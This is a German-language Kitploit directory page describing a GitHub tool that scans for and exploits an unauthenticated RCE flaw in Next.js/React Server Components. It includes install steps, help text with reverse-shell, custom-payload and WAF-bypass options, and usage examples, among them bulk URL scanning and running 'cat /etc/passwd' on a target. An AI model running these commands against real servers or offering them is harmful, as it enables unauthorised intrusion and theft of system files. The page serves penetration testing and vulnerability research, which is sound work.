Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-Waf — CVE-2025-55182 RCE-Sicherheitslücke in Next.js/React RSC-Servern (Exploit und Scanner) | Kitploit
Tools/GitHubGitHub/l0n3m4n/cve-2025-55182-waf
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubl0n3m4n/cve-2025-55182-waf

CVE-2025-55182-Waf

CVE-2025-55182 RCE-Sicherheitslücke in Next.js/React RSC-Servern (Exploit und Scanner)

Repository anzeigen
2114vor 9 MonatenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js/React RSC Scanner & Exploit - RCE

Besucher Facebook X Medium Kauf mir einen Kaffee ProtonMail


Dieses Tool wurde für Sicherheitsforscher und Penetrationstester entwickelt, um die Schwachstelle CVE-2025-55182 in Next.js/React RSC-Anwendungen zu erkennen und auszunutzen. Es bietet mehrere Scan-Modi, Exploit-Funktionen und WAF-Umgehungstechniken.

✨ Funktionen

  • 🎯 Mehrere Scan-Modi: Wählen Sie zwischen den Modi rce, safe und vercel_bypass.
  • 💥 Einfache Ausnutzung: Führen Sie Befehle aus oder holen Sie sich eine Reverse Shell auf verwundbaren Zielen.
  • 📂 Benutzerdefinierte Payloads: Geben Sie benutzerdefinierte Payloads als Zeichenfolge oder aus einer Datei an.
  • 🛡️ WAF-Umgehung: Techniken zur Umgehung von Web Application Firewalls.
  • ⚡ Schnell und nebenläufig: Scannt mehrere Ziele mit asyncio.
  • 📝 Ausführliche Ausgabe: Gepflegte und detaillierte Ausgabe zur einfachen Fehlerbehebung.
  • 🎨 Farbige Ausgabe: Für bessere Lesbarkeit.
  • 🤖 Automatische Betriebssystemerkennung: Erkennt automatisch das Betriebssystem des Ziels (Linux/Windows) für eine intelligentere Ausnutzung, insbesondere bei Reverse Shells.

📈 Schwachstellendetails

KategorieInformation
Veröffentlicht2025-12-03
Basis-Score10.0 (KRITISCH)
ForscherLachlan Davidson (https://github.com/lachlan2k)
VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
BeschreibungEine kritische Remote Code Execution (RCE)-Schwachstelle in React Server Components. Anwendungen, die die serverseitige Laufzeit von React nutzen, einschließlich Frameworks wie Next.js, sind betroffen. Das Problem wird durch unsicheres Deserialisieren von nicht vertrauenswürdigen "Flight"-Protokolldaten verursacht, was einem Angreifer ermöglicht, Code ohne Authentifizierung auf dem Server auszuführen. Ein Update auf gepatchte React- und Framework-Versionen ist erforderlich.
EPSS-Score27,81 % (Wahrscheinlichkeit der Ausnutzung)
CISA KEV-KatalogGelistet: Ja, Ransomware: Unbekannt
HackerOne HacktivityRang: 1, Berichte: 92
Patch-PrioritätA+

🎯 Betroffene Versionen

Diese Schwachstelle betrifft die folgenden Versionen von React Server Components:

  • React Server Components: 19.0.0, 19.1.0, 19.1.1 und 19.2.0
  • Next.js-Versionen ≥14.3.0-canary.77, alle 15.x und 16.x
  • Frameworks, die RSC nutzen: React Router (RSC-Modus), Waku, Redwood SDK und verschiedene RSC-Plugins

Die folgenden Pakete sind ebenfalls betroffen:

  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-webpack

🛠️ Installation```bash

git clone https://github.com/l0n3m4n/CVE-2025-55182.git cd CVE-2025-55182

Create a virtual environment

python3 -m venv venv-55182 source venv-55182/bin/activate

Install dependencies

pip install -r requirements.txt

## Verwendung```bash
❯ python3 CVE-2025-55182.py -h

__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
                         [-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]

Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications

options:
  -h, --help                       show this help message and exit
  -u, --url URL                    Single URL to scan or exploit.
  -f, --file FILE                  File containing a list of URLs to scan/exploit.

Exploitation Options:
  -c, --command COMMAND            Command to execute on the target(s).
  -p, --payloads PAYLOAD           Custom payload to execute on the target(s). Can be a string or a
                                   file path.
  -r, --reverse-shell LHOST:LPORT  Attempt a reverse shell.

Scanning Options:
  -sm, --scan-mode MODE            Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
                                   rce)
  -wb, --waf-bypass                Add junk data to the request to bypass WAFs.
  -wbs, --waf-bypass-size KB       Size of junk data in KB (default: 128).
  -wbu, --waf-bypass-utf16le       Use UTF-16LE encoding to bypass WAFs.

General Options:
  -o, --output FILE                File to save vulnerable URLs from scans.
  -t, --threads NUM                Number of concurrent threads (default: 10).
  -T, --timeout SEC                Request timeout in seconds (default: 10).
  -P, --proxy URL                  Proxy to use (e.g., http://127.0.0.1:8080).
  -H, --header HEADER              Add custom headers (e.g., 'Cookie: session=...').
  -v, --verbose                    Enable verbose output for success/failed/non-vulnerable checks.

🔬 Scan-Modi

  • rce (Standard): Aktiver Scan-Modus, führt einen echo-Befehl aus, um die Sicherheitslücke zu bestätigen. Dies ist die zuverlässigste Methode, kann jedoch Protokolle auf dem Zielsystem hinterlassen.
  • safe: Seitenkanal-Scan-Modus, führt keine Befehle aus. Er prüft auf eine bestimmte Fehlermeldung (E{"digest"), um festzustellen, ob das Ziel verwundbar ist. Dies ist sicherer als der rce-Modus, aber möglicherweise weniger zuverlässig.
  • vercel_bypass: Verwendet eine spezifische Payload, um das WAF von Vercel zu umgehen, und prüft die Befehlsausgabe im X-Action-Redirect-Header.

WAF-Bypass durch verschiedene Kodierungstechniken

Credit @coffinxp7 wafbyass

🚀 Beispiele

Scannen```bash

Scan a single URL with the default rce check

python3 CVE-2025-55182.py -u http://target.com

Scan a list of URLs with the safe mode and 20 threads

python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20

Scan with Vercel WAF bypass mode and save vulnerable URLs to a file

python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt

### Ausnutzung```bash
# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"
Tool herunterladen